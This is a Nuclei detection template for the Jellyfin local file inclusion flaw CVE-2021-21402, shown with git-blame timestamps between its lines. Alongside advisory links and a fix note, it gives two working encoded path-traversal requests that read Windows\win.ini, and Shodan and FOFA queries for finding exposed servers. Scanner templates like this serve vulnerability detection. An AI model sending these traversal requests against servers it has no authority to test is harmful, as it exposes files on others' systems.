2021-04-01 22:16:53 +00:00
id : CVE-2021-21402
info :
2022-07-26 13:45:11 +00:00
name : Jellyfin <10.7.0 - Local File Inclusion
2021-04-01 22:16:53 +00:00
author : dwisiswant0
2021-09-10 11:26:40 +00:00
severity : medium
2021-04-01 22:16:53 +00:00
description : |
2022-07-26 13:45:11 +00:00
Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.
2022-04-22 10:38:41 +00:00
reference :
- https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
2022-05-17 09:18:12 +00:00
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx
- https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1
- https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21402
2023-04-12 10:55:48 +00:00
remediation : This is fixed in version 10.7.1.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-21402
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
epss-score : 0.30694
2022-05-12 14:18:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-05-12 14:18:36 +00:00
fofa-query : title="Jellyfin" || body="http://jellyfin.media"
2022-05-17 09:18:12 +00:00
shodan-query : http.html:"Jellyfin"
2023-04-12 10:55:48 +00:00
verified : "true"
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,jellyfin,lfi
2021-04-01 22:16:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-01 22:16:53 +00:00
- method : GET
path :
2021-04-02 00:11:37 +00:00
- "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
- "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
2021-04-01 22:16:53 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-04-02 00:17:18 +00:00
- type : word
words :
- "Content-Type: application/octet-stream"
part : header
2021-04-01 22:16:53 +00:00
- type : regex
regex :
- "\\[(font|extension|file)s\\]"
2022-05-12 14:18:36 +00:00
part : body
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22